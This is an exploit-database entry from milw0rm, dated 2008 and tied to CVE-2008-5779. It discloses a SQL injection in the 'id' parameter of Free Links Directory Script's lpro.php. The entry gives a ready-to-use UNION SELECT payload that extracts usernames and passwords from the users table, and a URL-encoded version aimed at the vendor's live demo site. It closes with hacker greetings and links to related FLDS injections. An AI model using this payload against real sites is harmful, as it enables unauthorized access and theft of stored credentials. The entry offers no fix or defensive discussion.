#Free Links Directory Script (id) SQL Injection Vulnerability #Author: nuclear #site: http://flds-script.com #vuln: http://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users #demo: http://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users #notes: Script is full of bugs like this, too bored to catch em all ! #greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar # milw0rm.com [2008-12-15]
Related Exploits
Trying to match CVEs (1): CVE-2008-5779Trying to match OSVDBs (1): 50723
Other Possible E-DB Search Terms: FLDS 1.2a, FLDS
Date | D | V | Title | Author |
---|---|---|---|---|
2008-12-14 |
![]() |
FLDS 1.2a - 'redir.php' SQL Injection | nuclear | |
2008-12-16 |
![]() |
FLDS 1.2a - 'report.php' SQL Injection | ka0x |